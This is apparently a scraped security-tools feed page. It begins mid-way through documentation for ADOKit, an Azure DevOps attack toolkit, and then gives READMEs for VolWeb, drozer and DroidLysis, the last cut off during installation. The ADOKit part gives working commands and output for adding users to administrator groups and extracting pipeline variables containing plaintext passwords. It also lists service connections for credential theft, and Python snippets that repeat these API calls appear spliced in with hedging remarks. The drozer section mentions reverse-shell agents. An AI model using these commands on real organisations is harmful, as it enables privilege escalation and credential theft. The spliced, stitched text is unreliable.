
      ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      Example Output

      C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

      ==================================================
      Module: addprojectadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 2:52:45 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

      [+] SUCCESS: User successfully added

      Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
      [MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1

      4/4/23 18:52:47 Finished execution of addprojectadmin
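Group-membership changes like this correspond to the documented Graph Memberships "add" call: a PUT of the user's subject descriptor under the target group's descriptor (a DELETE to the same URL removes the membership). Whether ADOKit calls this exact endpoint is an assumption, and both descriptors below are placeholders that would first be resolved via the Graph users/groups listings sketched earlier.

import requests

ORG = "organizationName"     # placeholder
PAT = "apiKey"               # placeholder
USER_DESC = "aad.ZjA0..."    # placeholder subject (user) descriptor
GROUP_DESC = "vssgp.Uy0x..." # placeholder container (group) descriptor

resp = requests.put(
    f"https://vssps.dev.azure.com/{ORG}/_apis/graph/memberships/"
    f"{USER_DESC}/{GROUP_DESC}?api-version=7.1-preview.1",
    auth=("", PAT),
)
resp.raise_for_status()  # a DELETE to the same URL removes the membership

The remaining add*/remove* modules in this section (build admins, collection admins, and the service-account groups) presumably reduce to this same call with a different container group descriptor.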

      Remove Project Admin

      Use Case

      Remove a user from the Project Administrators group for a given project.

      Syntax

Provide the removeprojectadmin module along with a /project: and /user: for a given user to be removed from the Project Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

      ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      Example Output

      C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

      ==================================================
      Module: removeprojectadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 3:19:43 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

      [+] SUCCESS: User successfully removed

      Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

      4/4/23 19:19:44 Finished execution of removeprojectadmin

      Add Build Admin

      Use Case

      Add a user to the Build Administrators group for a given project.

      Syntax

Provide the addbuildadmin module along with a /project: and /user: for a given user to be added to the Build Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

      ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      Example Output

      C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

      ==================================================
      Module: addbuildadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 3:41:51 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

      [+] SUCCESS: User successfully added

      Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

      4/4/23 19:41:55 Finished execution of addbuildadmin

      Remove Build Admin

      Use Case

      Remove a user from the Build Administrators group for a given project.

      Syntax

Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

      ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

      Example Output

      C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

      ==================================================
      Module: removebuildadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 3:42:10 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

      [+] SUCCESS: User successfully removed

      Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

      4/4/23 19:42:11 Finished execution of removebuildadmin

      Add Collection Admin

      Use Case

      Add a user to the Project Collection Administrators group.

      Syntax

Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

      ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: addcollectionadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 4:04:40 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to add user1 to the Project Collection Administrators group.

      [+] SUCCESS: User successfully added

      Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
      [YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1

      4/4/23 20:04:43 Finished execution of addcollectionadmin

      Remove Collection Admin

      Use Case

      Remove a user from the Project Collection Administrators group.

      Syntax

Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

      ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: removecollectionadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 4:10:35 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

      [+] SUCCESS: User successfully removed

      Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith

      4/4/23 20:10:38 Finished execution of removecollectionadmin

      Add Collection Build Admin

      Use Case

      Add a user to the Project Collection Build Administrators group.

      Syntax

Provide the addcollectionbuildadmin module along with a /user: for a given user to be added to the Project Collection Build Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

      ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: addcollectionbuildadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/5/2023 8:21:39 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

      [+] SUCCESS: User successfully added

      Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

      4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

      Remove Collection Build Admin

      Use Case

      Remove a user from the Project Collection Build Administrators group.

      Syntax

Provide the removecollectionbuildadmin module along with a /user: for a given user to be removed from the Project Collection Build Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

      ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: removecollectionbuildadmin
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/5/2023 8:21:59 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

      [+] SUCCESS: User successfully removed

      Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

      4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

      Add Collection Build Service Account

      Use Case

      Add a user to the Project Collection Build Service Accounts group.

      Syntax

Provide the addcollectionbuildsvc module along with a /user: for a given user to be added to the Project Collection Build Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

      ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: addcollectionbuildsvc
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/5/2023 8:22:13 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

      [+] SUCCESS: User successfully added

      Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

      4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

      Remove Collection Build Service Account

      Use Case

      Remove a user from the Project Collection Build Service Accounts group.

      Syntax

Provide the removecollectionbuildsvc module along with a /user: for a given user to be removed from the Project Collection Build Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

      ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: removecollectionbuildsvc
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/5/2023 8:22:27 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

      [+] SUCCESS: User successfully removed

      Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

      4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

      Add Collection Service Account

      Use Case

      Add a user to the Project Collection Service Accounts group.

      Syntax

Provide the addcollectionsvc module along with a /user: for a given user to be added to the Project Collection Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

      ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: addcollectionsvc
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/5/2023 11:21:01 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

      [+] SUCCESS: User successfully added

      Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
      [YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

      4/5/23 15:21:04 Finished execution of addcollectionsvc

      Remove Collection Service Account

      Use Case

      Remove a user from the Project Collection Service Accounts group.

      Syntax

Provide the removecollectionsvc module along with a /user: for a given user to be removed from the Project Collection Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

      ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

      ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

      Example Output

      C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

      ==================================================
      Module: removecollectionsvc
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/5/2023 11:21:43 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

      [+] SUCCESS: User successfully removed

      Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith

      4/5/23 15:21:44 Finished execution of removecollectionsvc

      Get Pipeline Variables

      Use Case

      Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.

      Syntax

Provide the getpipelinevars module along with a /project: for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects, specify all in the /project: argument.

      ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

      ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

      ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

      ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

      Example Output

      C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

      ==================================================
      Module: getpipelinevars
      Auth Type: Cookie
      Project: maraudersmap
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/6/2023 12:08:35 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Pipeline Var Name | Pipeline Var Value
      -----------------------------------------------------------------------------------
      credential | P@ssw0rd123!
      url | http://blah/

      4/6/23 16:08:36 Finished execution of getpipelinevars
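Pipeline variables live on build definitions and can be pulled with the documented Build Definitions API: list the definitions, then fetch each one and read its variables map. A sketch with placeholder organization, project, and PAT values; whether ADOKit uses this exact endpoint is an assumption.

import requests

ORG_URL = "https://dev.azure.com/organizationName"  # placeholder
PROJECT = "maraudersmap"                            # placeholder
PAT = "apiKey"                                      # placeholder

defs = requests.get(
    f"{ORG_URL}/{PROJECT}/_apis/build/definitions?api-version=7.1-preview.7",
    auth=("", PAT),
).json()["value"]

for d in defs:
    # The list call returns summaries; fetch each definition for its variables.
    detail = requests.get(
        f"{ORG_URL}/{PROJECT}/_apis/build/definitions/{d['id']}?api-version=7.1-preview.7",
        auth=("", PAT),
    ).json()
    for name, var in detail.get("variables", {}).items():
        print(name, var.get("value"))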

      Get Pipeline Secrets

      Use Case

Extract the names of any pipeline secrets being used in project(s), which directs the operator to where secret extraction can be attempted.

      Syntax

Provide the getpipelinesecrets module along with a /project: for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects, specify all in the /project: argument.

      ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

      ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

      ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

      ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

      Example Output

      C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

      ==================================================
      Module: getpipelinesecrets
      Auth Type: Cookie
      Project: maraudersmap
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/10/2023 10:28:37 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Build Secret Name | Build Secret Value
      -----------------------------------------------------
      anotherSecretPass | [HIDDEN]
      secretpass | [HIDDEN]

      4/10/23 14:28:38 Finished execution of getpipelinesecrets
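Continuing the variable-extraction sketch above, secret variables carry an isSecret flag on the same definition objects, and the API does not return their values, which matches the [HIDDEN] column shown here.

for name, var in detail.get("variables", {}).items():  # 'detail' from the prior sketch
    if var.get("isSecret"):
        print(name, "[HIDDEN]")  # the value itself is never returned by the API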

      Get Service Connections

      Use Case

List any service connections being used in project(s), which directs the operator to where credential extraction can be attempted for those service connections.

      Syntax

Provide the getserviceconnections module along with a /project: for a given project to list any service connections being used. If you would like to list service connections being used across all projects, specify all in the /project: argument.

      ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

      ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

      ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

      ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

      Example Output

      C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

      ==================================================
      Module: getserviceconnections
      Auth Type: Cookie
      Project: maraudersmap
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/11/2023 8:34:16 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Connection Name | Connection Type | ID
      --------------------------------------------------------------------------------------------------------------------------------------------------
      Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
      Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
      Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
      Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

      4/11/23 12:34:16 Finished execution of getserviceconnections
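Service connections are exposed through the documented Service Endpoints REST API. A minimal sketch with placeholder values; whether ADOKit uses this exact endpoint is an assumption.

import requests

ORG_URL = "https://dev.azure.com/organizationName"  # placeholder
PROJECT = "maraudersmap"                            # placeholder
PAT = "apiKey"                                      # placeholder

resp = requests.get(
    f"{ORG_URL}/{PROJECT}/_apis/serviceendpoint/endpoints?api-version=7.1-preview.4",
    auth=("", PAT),
)
resp.raise_for_status()
for ep in resp.json()["value"]:
    print(ep["name"], ep["type"], ep["id"])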

      Detection

      Below are static signatures for the specific usage of this tool in its default state:

• Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
  • See ADOKit Yara Rule in this repo.
• User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
  • See ADOKit Snort Rule in this repo.
• Microsoft Sentinel Rules
  • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
  • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

      For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.

      Roadmap

      • Support for Azure DevOps Server

      References

      • https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
      • https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      VolWeb - A Centralized And Enhanced Memory Analysis Platform

      By: Zion3R β€” April 2nd 2024 at 11:30


      VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.


      Objective

      The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.

      By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.

      Project Documentation and Getting Started Guide

      The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.

[!IMPORTANT] Take time to read the documentation in order to avoid common misconfiguration issues.

      Interacting with the REST API

VolWeb exposes a REST API to allow analysts to interact with the platform. A dedicated repository offers scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts. Check the project wiki to learn more about the available API calls.

      Issues

      If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.

      Contact

      Contact me at k1nd0ne@mail.com for any questions regarding this tool.

      Next Release Goals

      Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Drozer - The Leading Security Assessment Framework For Android

      By: Zion3R β€” April 1st 2024 at 11:30


      drozer (formerly Mercury) is the leading security testing framework for Android.

      drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

      drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience to show the impact of exporting certain components on a device.

      drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/


      Docker Container

To make sure drozer can be run on modern systems, a Docker container was created with a working build of drozer. This is currently the recommended method of using drozer on modern systems.

      • The Docker container and basic setup instructions can be found here.
      • Instructions on building your own Docker container can be found here.

      Manual Building and Installation

      Prerequisites

1. Python 2.7

Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

2. Protobuf 2.6 or greater

3. Pyopenssl 16.2 or greater

4. Twisted 10.2 or greater

5. Java Development Kit 1.7

Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

6. Android Debug Bridge

      Building Python wheel

      git clone https://github.com/WithSecureLabs/drozer.git
      cd drozer
      python setup.py bdist_wheel

      Installing Python wheel

      sudo pip install dist/drozer-2.x.x-py2-none-any.whl

      Building for Debian/Ubuntu/Mint

      git clone https://github.com/WithSecureLabs/drozer.git
      cd drozer
      make deb

      Installing .deb (Debian/Ubuntu/Mint)

      sudo dpkg -i drozer-2.x.x.deb

      Building for Redhat/Fedora/CentOS

      git clone https://github.com/WithSecureLabs/drozer.git
      cd drozer
      make rpm

      Installing .rpm (Redhat/Fedora/CentOS)

sudo rpm -i drozer-2.x.x-1.noarch.rpm

      Building for Windows

      NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

      git clone https://github.com/WithSecureLabs/drozer.git
      cd drozer
      python.exe setup.py bdist_msi

      Installing .msi (Windows)

      Run dist/drozer-2.x.x.win-x.msi 

      Usage

      Installing the Agent

      Drozer can be installed using Android Debug Bridge (adb).

      Download the latest Drozer Agent here.

      $ adb install drozer-agent-2.x.x.apk

      Starting a Session

      You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.

      We will use the server embedded in the drozer Agent to do this.

      If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

      $ adb forward tcp:31415 tcp:31415

      Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

      Then, on your PC, connect using the drozer Console:

      On Linux:

      $ drozer console connect

      On Windows:

      > drozer.bat console connect

      If using a real device, the IP address of the device on the network must be specified:

      On Linux:

      $ drozer console connect --server 192.168.0.10

      On Windows:

      > drozer.bat console connect --server 192.168.0.10

      You should be presented with a drozer command prompt:

      selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
      dz>

      The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

      You are now ready to start exploring the device.
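
The manual install/forward/connect steps above can also be scripted. Below is a minimal sketch using Python's subprocess module, assuming adb and the drozer console are on PATH; the 2.x.x version placeholder is kept from the examples above:

import subprocess

# Install the Agent, forward drozer's default port, then connect the Console.
subprocess.run(["adb", "install", "drozer-agent-2.x.x.apk"], check=True)
subprocess.run(["adb", "forward", "tcp:31415", "tcp:31415"], check=True)
subprocess.run(["drozer", "console", "connect"], check=True)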

      Command Reference

Command | Description
--------|------------
run | Executes a drozer module
list | Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
shell | Start an interactive Linux shell on the device, in the context of the Agent process.
cd | Mounts a particular namespace as the root of the session, to avoid having to repeatedly type the full name of a module.
clean | Remove temporary files stored by drozer on the Android device.
contributors | Displays a list of people who have contributed to the drozer framework and modules in use on your system.
echo | Print text to the console.
exit | Terminate the drozer session.
help | Display help about a particular command or module.
load | Load a file containing drozer commands, and execute them in sequence.
module | Find and install additional drozer modules from the Internet.
permissions | Display a list of the permissions granted to the drozer Agent.
set | Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
unset | Remove a named variable that drozer passes to any Linux shells that it spawns.

      License

      drozer is released under a 3-clause BSD License. See LICENSE for full details.

      Contacting the Project

      drozer is Open Source software, made great by contributions from the community.

      Bug reports, feature requests, comments and questions can be submitted here.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      DroidLysis - Property Extractor For Android Apps

      By: Zion3R β€” March 31st 2024 at 11:30


      DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

      DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.


      Installing DroidLysis

1. Install required system packages:

sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev

2. Install Android disassembly tools: Apktool, Baksmali, and optionally Dex2jar and (obsolete) Procyon (note that Procyon only works with Java 8, not Java 11):

$ mkdir -p ~/softs
$ cd ~/softs
$ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
$ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
$ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
$ unzip dex-tools-v2.4.zip
$ rm -f dex-tools-v2.4.zip

3. Get DroidLysis from the Git repository (preferred) or from pip.

      Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

      $ python3 -m venv venv
